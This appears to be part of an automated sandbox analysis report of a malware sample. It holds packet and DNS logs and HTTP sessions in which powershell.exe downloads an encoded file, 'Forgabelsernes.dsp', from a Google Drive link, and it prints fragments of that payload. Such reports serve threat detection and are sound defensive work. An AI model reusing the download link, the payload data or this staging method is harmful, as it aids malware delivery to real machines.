                  Oct 1, 2024 07:46:32.735959053 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735966921 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.735985994 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735991955 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.736021996 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.736047983 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.736052036 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.736088991 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739779949 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739845037 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739922047 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739964008 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739969969 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739980936 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740019083 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.740024090 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740034103 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740057945 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.740075111 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.747998953 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748063087 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748073101 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748102903 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748102903 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748117924 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748143911 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748166084 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748172045 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748205900 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748209953 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748243093 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752142906 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752191067 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752197027 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752226114 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752229929 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752240896 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752263069 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752286911 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752290010 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752300024 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752321959 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752362967 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759267092 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759320021 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759339094 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759350061 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759377956 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759404898 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759406090 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759417057 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759481907 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759486914 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759524107 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762670994 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762734890 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762737036 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762749910 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762779951 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762785912 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762813091 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762819052 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762825966 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762851954 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762875080 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779198885 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779264927 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779292107 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779295921 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779309988 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779320955 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779356003 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779361010 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779397011 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779402018 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779419899 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779434919 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779443979 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779452085 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779464960 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779481888 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779481888 CEST49709443192.168.2.8142.250.184.193

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 1, 2024 07:45:54.471915960 CEST5451153192.168.2.81.1.1.1
                  Oct 1, 2024 07:45:54.478842020 CEST53545111.1.1.1192.168.2.8
                  Oct 1, 2024 07:45:55.518881083 CEST6346153192.168.2.81.1.1.1
                  Oct 1, 2024 07:45:55.525914907 CEST53634611.1.1.1192.168.2.8

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 1, 2024 07:45:54.471915960 CEST192.168.2.81.1.1.10x8af7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                  Oct 1, 2024 07:45:55.518881083 CEST192.168.2.81.1.1.10x5a48Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 1, 2024 07:45:54.478842020 CEST1.1.1.1192.168.2.80x8af7No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                  Oct 1, 2024 07:45:55.525914907 CEST1.1.1.1192.168.2.80x5a48No error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • drive.google.com
                  • drive.usercontent.google.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.849705172.217.16.2064437756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-10-01 05:45:55 UTC215OUTGET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:45:55 UTC1610INHTTP/1.1 303 See Other
                  Content-Type: application/binary
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Tue, 01 Oct 2024 05:45:55 GMT
                  Location: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download
                  Strict-Transport-Security: max-age=31536000
                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  Cross-Origin-Opener-Policy: same-origin
                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                  Content-Security-Policy: script-src 'nonce-imlt5SbfKhMcPeKWUc4-Ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                  Server: ESF
                  Content-Length: 0
                  X-XSS-Protection: 0
                  X-Frame-Options: SAMEORIGIN
                  X-Content-Type-Options: nosniff
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.849706142.250.184.1934437756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-10-01 05:45:56 UTC233OUTGET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.usercontent.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:45:58 UTC4858INHTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Content-Security-Policy: sandbox
                  Content-Security-Policy: default-src 'none'
                  Content-Security-Policy: frame-ancestors 'none'
                  X-Content-Security-Policy: sandbox
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Resource-Policy: same-site
                  X-Content-Type-Options: nosniff
                  Content-Disposition: attachment; filename="Forgabelsernes.dsp"
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Credentials: false
                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                  Accept-Ranges: bytes
                  Content-Length: 418636
                  Last-Modified: Mon, 30 Sep 2024 09:10:20 GMT
                  X-GUploader-UploadID: AD-8ljvPQk2tbpAqCrU65rk671DlT7lVgWgWVDAHclRM2e3AXtoJ3KF7lAKWztlFQ-BklYkPUnrWP8hOWg
                  Date: Tue, 01 Oct 2024 05:45:58 GMT
                  Expires: Tue, 01 Oct 2024 05:45:58 GMT
                  Cache-Control: private, max-age=0
                  X-Goog-Hash: crc32c=KtAZFA==
                  Server: UploadServer
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close
                  2024-10-01 05:45:58 UTC4858INData Raw: 63 51 47 62 63 51 47 62 75 34 33 42 46 41 44 72 41 72 5a 35 36 77 49 6c 54 51 4e 63 4a 41 52 78 41 5a 76 72 41 67 53 76 75 54 6e 41 2f 4f 33 72 41 6a 6a 4e 36 77 49 39 39 49 48 42 2b 44 42 4e 4a 58 45 42 6d 33 45 42 6d 34 48 78 4d 66 46 4a 45 2b 73 43 56 67 54 72 41 72 43 74 36 77 4b 75 41 58 45 42 6d 37 70 59 54 33 6e 66 63 51 47 62 36 77 4b 38 31 65 73 43 4c 4f 7a 72 41 6e 41 45 4d 63 72 72 41 68 42 6f 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 68 64 70 63 51 47 62 67 66 6b 7a 38 56 51 46 66 4d 78 78 41 5a 76 72 41 6d 64 51 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4a 48 72 59 48 44 6e 6b 57 55 41 75 73 43 44 59 58 72 41 6f 64 5a 75 6b 46 47 4e 59 70 78 41 5a 76 72 41 72 43
                  Data Ascii: cQGbcQGbu43BFADrArZ56wIlTQNcJARxAZvrAgSvuTnA/O3rAjjN6wI99IHB+DBNJXEBm3EBm4HxMfFJE+sCVgTrArCt6wKuAXEBm7pYT3nfcQGb6wK81esCLOzrAnAEMcrrAhBocQGbiRQLcQGbcQGb0eJxAZtxAZuDwQTrAhdpcQGbgfkz8VQFfMxxAZvrAmdQi0QkBHEBm3EBm4nDcQGb6wJHrYHDnkWUAusCDYXrAodZukFGNYpxAZvrArC
                  2024-10-01 05:45:58 UTC4858INData Raw: 70 69 42 35 35 4d 39 43 45 54 72 57 6f 56 53 79 68 2b 7a 62 70 4c 38 36 45 61 64 57 57 43 55 50 6f 44 73 65 39 31 64 35 38 48 2b 76 68 33 38 78 33 61 35 59 49 49 4b 61 33 48 34 37 68 31 62 68 56 76 4f 65 50 37 37 4d 47 76 4a 4f 50 30 51 6a 48 6a 39 44 39 6c 6a 58 70 5a 56 49 6c 7a 58 73 45 6a 31 62 69 79 77 73 4d 41 44 66 6b 68 2f 57 4f 4c 49 78 41 76 33 6e 33 58 2f 4f 4c 30 51 6f 74 65 2f 6c 58 62 74 55 6f 55 4b 6b 41 67 77 38 65 4d 76 4e 4c 57 59 67 4b 35 63 53 43 42 77 39 38 62 6b 36 31 33 61 73 70 64 42 31 70 67 71 62 6d 51 68 6a 4b 7a 6b 2f 45 31 71 5a 4a 56 59 6f 44 41 32 41 73 6c 78 58 6b 56 6b 34 51 38 6f 42 65 78 41 39 68 7a 76 6e 70 43 59 52 46 42 55 63 32 41 71 73 50 7a 30 49 54 39 36 32 49 47 38 53 46 44 35 52 43 4c 35 5a 44 71 72 47 49 47 68
                  Data Ascii: piB55M9CETrWoVSyh+zbpL86EadWWCUPoDse91d58H+vh38x3a5YIIKa3H47h1bhVvOeP77MGvJOP0QjHj9D9ljXpZVIlzXsEj1biywsMADfkh/WOLIxAv3n3X/OL0Qote/lXbtUoUKkAgw8eMvNLWYgK5cSCBw98bk613aspdB1pgqbmQhjKzk/E1qZJVYoDA2AslxXkVk4Q8oBexA9hzvnpCYRFBUc2AqsPz0IT962IG8SFD5RCL5ZDqrGIGh
                  2024-10-01 05:45:58 UTC124INData Raw: 68 4b 50 31 51 6a 45 76 47 77 35 35 58 77 78 7a 62 5a 2b 45 50 67 6b 51 39 63 61 67 62 2b 58 58 50 62 2b 4d 39 30 34 7a 6f 75 55 41 30 71 51 55 4a 7a 4b 69 2f 43 50 39 6c 32 69 77 46 58 57 54 2b 31 78 31 72 4b 49 74 58 64 64 69 66 33 32 68 4f 4e 42 70 78 76 71 57 38 68 65 4f 7a 63 39 32 50 56 2f 6c 4d 71 61 30 7a 4f 4e 4f 30 37 51 32 69 67 38 43 56 30 64 48 58 47 46 43
                  Data Ascii: hKP1QjEvGw55XwxzbZ+EPgkQ9cagb+XXPb+M904zouUA0qQUJzKi/CP9l2iwFXWT+1x1rKItXddif32hONBpxvqW8heOzc92PV/lMqa0zONO07Q2ig8CV0dHXGFC
                  2024-10-01 05:45:58 UTC1323INData Raw: 4d 41 44 43 32 7a 4f 34 77 34 79 63 33 41 7a 54 61 47 51 6f 76 2b 6c 77 74 32 72 62 4a 42 7a 5a 66 39 5a 47 4d 62 4a 4e 73 38 42 59 56 38 50 59 4c 78 4e 48 6d 6d 49 64 75 36 31 57 44 4d 73 49 50 6b 4c 65 77 5a 65 5a 41 71 61 6c 30 73 76 66 50 58 4d 75 44 6a 37 71 6c 31 58 7a 75 76 4f 4c 42 36 30 54 69 4d 35 67 75 59 46 69 42 51 66 46 54 39 76 44 77 42 31 51 78 4b 64 69 42 58 47 6e 6d 4b 72 44 77 41 68 6a 36 47 5a 71 39 58 79 68 52 37 67 52 6a 67 65 56 4f 59 41 73 77 47 61 70 64 78 4a 6c 38 73 47 65 69 42 68 39 39 43 7a 64 42 66 6c 5a 46 46 54 6b 66 43 65 7a 45 42 75 36 70 50 69 4f 64 64 5a 79 45 54 4b 2f 67 31 4a 6c 73 54 51 63 79 73 6c 39 78 30 48 69 39 45 4a 6e 58 52 38 4b 75 64 31 31 74 41 36 79 77 6b 69 77 44 64 42 75 6a 4e 64 39 58 49 31 35 41 58 79
                  Data Ascii: MADC2zO4w4yc3AzTaGQov+lwt2rbJBzZf9ZGMbJNs8BYV8PYLxNHmmIdu61WDMsIPkLewZeZAqal0svfPXMuDj7ql1XzuvOLB60TiM5guYFiBQfFT9vDwB1QxKdiBXGnmKrDwAhj6GZq9XyhR7gRjgeVOYAswGapdxJl8sGeiBh99CzdBflZFFTkfCezEBu6pPiOddZyETK/g1JlsTQcysl9x0Hi9EJnXR8Kud11tA6ywkiwDdBujNd9XI15AXy
                  2024-10-01 05:45:58 UTC1390INData Raw: 2f 46 55 6a 39 68 50 38 65 45 6c 42 77 37 39 77 71 70 69 4c 36 74 45 54 44 42 63 64 44 69 2b 48 42 64 57 34 56 37 73 69 6a 4d 43 2b 59 52 45 43 6d 50 4e 67 4f 74 64 51 41 70 71 4b 42 7a 6d 68 65 50 75 79 30 75 58 61 76 55 6d 4f 47 72 74 75 74 32 72 61 77 7a 39 43 57 4b 4c 50 53 54 54 44 78 73 45 49 78 34 2f 52 43 4d 59 76 35 31 48 51 43 33 4b 42 2b 65 64 32 71 59 51 38 46 55 56 7a 48 34 2b 77 61 56 56 71 5a 73 6c 67 57 69 6c 54 53 32 39 6d 4c 43 79 67 76 32 49 57 57 4b 71 6b 4f 61 51 2b 34 64 6d 46 44 4d 65 4e 4f 4b 55 76 37 6e 34 34 34 39 2b 41 44 53 5a 6f 44 63 37 53 66 54 2b 68 62 4c 74 4e 43 58 44 78 63 49 39 48 65 34 4d 6b 4f 41 70 57 70 4d 45 37 5a 79 72 41 68 53 55 70 76 48 48 57 77 65 79 67 6a 68 32 4a 59 30 73 72 62 47 6e 57 70 55 67 71 4a 6a 4c
                  Data Ascii: /FUj9hP8eElBw79wqpiL6tETDBcdDi+HBdW4V7sijMC+YRECmPNgOtdQApqKBzmhePuy0uXavUmOGrtut2rawz9CWKLPSTTDxsEIx4/RCMYv51HQC3KB+ed2qYQ8FUVzH4+waVVqZslgWilTS29mLCygv2IWWKqkOaQ+4dmFDMeNOKUv7n4449+ADSZoDc7SfT+hbLtNCXDxcI9He4MkOApWpME7ZyrAhSUpvHHWweygjh2JY0srbGnWpUgqJjL
                  2024-10-01 05:45:58 UTC1390INData Raw: 6d 4e 48 7a 41 74 72 61 48 6e 47 4d 65 50 30 46 59 37 57 46 4c 31 41 59 67 4d 36 45 35 50 6a 77 38 5a 6f 6a 70 65 61 59 67 4e 4e 34 48 61 2b 77 39 34 76 41 6f 79 32 61 75 75 44 42 49 31 69 32 4e 64 37 54 7a 6f 30 55 4b 61 56 6d 31 72 47 4e 74 56 45 58 78 70 4b 58 48 76 72 37 45 66 4c 69 78 6f 45 71 65 4d 41 76 71 76 34 59 7a 55 61 4b 4e 6b 67 45 55 45 78 37 44 4e 78 70 65 50 30 51 6a 48 6a 39 44 58 2f 31 52 38 6a 2f 55 72 54 64 68 4e 33 55 38 4f 51 5a 62 53 47 4c 2b 65 30 44 49 79 74 2f 4c 7a 6c 4f 33 76 48 59 62 79 78 45 34 67 49 6e 50 30 66 59 6a 58 51 38 4b 56 43 77 2f 42 67 49 72 73 72 73 47 6a 4c 30 75 72 2f 33 31 66 61 50 54 51 31 44 74 72 59 59 74 47 47 53 75 6d 6f 32 38 53 4a 4b 41 58 52 75 72 57 66 64 69 2b 46 7a 59 68 71 5a 6a 30 62 32 50 76 78
                  Data Ascii: mNHzAtraHnGMeP0FY7WFL1AYgM6E5Pjw8ZojpeaYgNN4Ha+w94vAoy2auuDBI1i2Nd7Tzo0UKaVm1rGNtVEXxpKXHvr7EfLixoEqeMAvqv4YzUaKNkgEUEx7DNxpeP0QjHj9DX/1R8j/UrTdhN3U8OQZbSGL+e0DIyt/LzlO3vHYbyxE4gInP0fYjXQ8KVCw/BgIrsrsGjL0ur/31faPTQ1DtrYYtGGSumo28SJKAXRurWfdi+FzYhqZj0b2Pvx
                  2024-10-01 05:45:58 UTC1390INData Raw: 50 55 77 4e 44 74 6d 4c 39 50 4c 7a 55 31 38 79 7a 51 56 58 4d 6a 2b 41 39 61 52 48 67 37 54 42 57 41 7a 4f 67 35 45 2f 30 66 34 34 37 79 41 6d 50 32 48 5a 47 49 75 6d 39 6e 58 33 2f 72 4f 4c 30 51 6f 36 32 4c 51 4a 55 59 68 75 55 37 47 59 4e 54 54 48 77 65 55 49 78 34 2f 52 43 4d 59 6b 6d 69 50 5a 4f 49 68 66 2f 4a 65 49 44 68 30 43 78 4a 79 47 51 43 41 43 74 62 4c 49 4b 4c 45 74 54 68 59 31 73 48 55 38 63 75 33 55 75 61 6c 31 75 4a 43 4b 59 79 36 74 4d 59 6e 57 31 51 69 6e 4f 47 72 41 4d 2b 48 4f 78 30 50 74 44 4b 39 54 30 51 6a 48 6a 39 45 4a 77 74 79 69 6f 34 75 6f 52 6e 53 62 33 42 46 6d 38 54 6f 77 50 75 55 6d 6a 54 54 5a 45 69 45 49 78 34 2f 52 43 4d 5a 62 39 39 36 41 70 47 43 75 43 44 63 2f 50 48 73 6f 65 4b 4c 62 34 58 58 79 4e 6b 63 43 42 62 47
                  Data Ascii: PUwNDtmL9PLzU18yzQVXMj+A9aRHg7TBWAzOg5E/0f447yAmP2HZGIum9nX3/rOL0Qo62LQJUYhuU7GYNTTHweUIx4/RCMYkmiPZOIhf/JeIDh0CxJyGQCACtbLIKLEtThY1sHU8cu3Uual1uJCKYy6tMYnW1QinOGrAM+HOx0PtDK9T0QjHj9EJwtyio4uoRnSb3BFm8TowPuUmjTTZEiEIx4/RCMZb996ApGCuCDc/PHsoeKLb4XXyNkcCBbG
                  2024-10-01 05:45:58 UTC1390INData Raw: 57 4c 77 5a 6b 34 52 63 58 2b 77 31 39 42 51 64 56 43 31 6a 6f 42 44 4f 63 45 38 50 69 31 50 59 4a 41 75 54 77 54 39 6b 30 4a 6b 74 31 53 7a 66 4c 6b 78 62 77 52 77 72 71 75 4a 4f 6e 42 4a 7a 64 54 56 53 63 33 41 78 47 4e 4b 30 4a 77 4e 6b 4c 42 50 38 41 50 51 7a 38 50 79 48 77 75 4b 38 57 49 66 49 62 6f 46 41 73 50 79 2b 48 36 6f 79 32 72 50 45 68 50 6a 73 2f 44 70 67 38 73 44 67 49 2b 48 69 49 32 57 65 48 32 4d 6d 30 34 76 2f 37 54 46 4c 53 47 34 66 63 39 32 34 66 52 43 59 46 70 72 6f 6f 75 58 64 62 4f 66 63 32 6e 57 73 42 49 34 44 6b 35 4f 64 62 4f 38 44 42 6d 77 73 43 4a 6b 62 33 75 6a 70 39 36 34 41 50 31 4a 72 4e 6f 4c 50 7a 54 41 73 69 68 72 33 78 74 6f 44 5a 32 4b 69 2b 74 34 75 67 33 50 37 33 30 72 68 50 6f 52 76 4a 72 44 4c 79 78 44 51 33 37 42
                  Data Ascii: WLwZk4RcX+w19BQdVC1joBDOcE8Pi1PYJAuTwT9k0Jkt1SzfLkxbwRwrquJOnBJzdTVSc3AxGNK0JwNkLBP8APQz8PyHwuK8WIfIboFAsPy+H6oy2rPEhPjs/Dpg8sDgI+HiI2WeH2Mm04v/7TFLSG4fc924fRCYFproouXdbOfc2nWsBI4Dk5OdbO8DBmwsCJkb3ujp964AP1JrNoLPzTAsihr3xtoDZ2Ki+t4ug3P730rhPoRvJrDLyxDQ37B
                  2024-10-01 05:45:58 UTC1390INData Raw: 31 4a 77 73 6c 57 72 41 4d 78 65 5a 74 6c 71 58 65 75 41 4c 31 65 36 78 6e 4e 54 73 2f 47 59 65 73 6c 35 30 52 6b 30 57 68 58 75 5a 51 5a 31 36 50 78 59 56 52 6a 32 58 63 63 68 6b 58 4f 72 47 34 78 55 55 4d 47 77 6b 58 71 38 50 33 37 4d 4a 78 77 72 56 4b 31 39 6a 41 77 73 50 48 35 6d 32 39 4a 47 49 43 6d 4f 4f 2f 63 63 50 48 4c 45 6f 32 69 47 49 61 78 79 6f 58 36 78 57 74 61 68 4e 4c 42 6e 36 53 78 2f 4b 59 30 30 2b 30 58 7a 46 55 47 71 35 45 4d 59 50 78 66 76 4c 74 55 4d 4e 54 39 71 62 33 45 6b 4e 4b 31 79 6f 75 43 46 57 74 34 43 52 2f 42 45 65 70 35 4a 32 61 74 48 4f 49 2b 42 55 73 4a 41 67 7a 71 38 62 48 76 58 57 73 69 4f 75 49 72 72 41 56 62 32 49 63 39 7a 67 52 2f 75 32 52 39 62 62 67 79 46 39 6e 4c 33 33 48 2b 7a 45 55 41 31 37 38 50 51 30 64 73 71
                  Data Ascii: 1JwslWrAMxeZtlqXeuAL1e6xnNTs/GYesl50Rk0WhXuZQZ16PxYVRj2XcchkXOrG4xUUMGwkXq8P37MJxwrVK19jAwsPH5m29JGICmOO/ccPHLEo2iGIaxyoX6xWtahNLBn6Sx/KY00+0XzFUGq5EMYPxfvLtUMNT9qb3EkNK1youCFWt4CR/BEep5J2atHOI+BUsJAgzq8bHvXWsiOuIrrAVb2Ic9zgR/u2R9bbgyF9nL33H+zEUA178PQ0dsq
                  2024-10-01 05:45:58 UTC1390INData Raw: 71 6f 71 39 6b 53 4e 4d 32 33 54 70 69 51 49 4f 71 33 42 6a 45 2f 30 51 6a 48 73 2b 38 59 4d 6c 2f 52 43 62 72 48 37 52 56 57 51 39 45 49 78 34 2f 52 43 63 4e 5a 45 4e 72 75 67 58 73 45 36 47 4d 35 6c 37 46 6e 47 48 46 59 58 66 39 64 58 34 66 52 43 50 75 55 6c 58 7a 48 6a 39 45 49 78 34 34 7a 37 4b 46 73 74 36 50 53 74 38 45 61 38 64 72 2b 49 30 45 58 41 58 5a 6d 79 41 65 5a 65 43 79 71 55 79 72 56 4b 62 47 76 72 44 38 50 33 59 68 35 4f 38 6d 49 79 43 45 75 2b 79 73 50 66 57 6b 38 77 7a 57 72 36 32 48 59 67 38 58 75 39 64 30 49 32 62 41 64 4a 39 78 64 63 47 49 6f 44 72 54 30 78 77 30 45 4f 48 52 37 31 57 32 4f 34 36 6d 76 2b 30 52 70 73 30 63 75 31 71 69 71 33 6e 2f 50 6b 73 4e 66 51 30 6c 4e 72 63 42 53 50 72 5a 30 4c 51 47 49 43 67 4f 5a 4c 4d 73 50 66
                  Data Ascii: qoq9kSNM23TpiQIOq3BjE/0QjHs+8YMl/RCbrH7RVWQ9EIx4/RCcNZENrugXsE6GM5l7FnGHFYXf9dX4fRCPuUlXzHj9EIx44z7KFst6PSt8Ea8dr+I0EXAXZmyAeZeCyqUyrVKbGvrD8P3Yh5O8mIyCEu+ysPfWk8wzWr62HYg8Xu9d0I2bAdJ9xdcGIoDrT0xw0EOHR71W2O46mv+0Rps0cu1qiq3n/PksNfQ0lNrcBSPrZ0LQGICgOZLMsPf


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.849708172.217.16.2064433136C:\Windows\SysWOW64\msiexec.exe
                  TimestampBytes transferredDirectionData
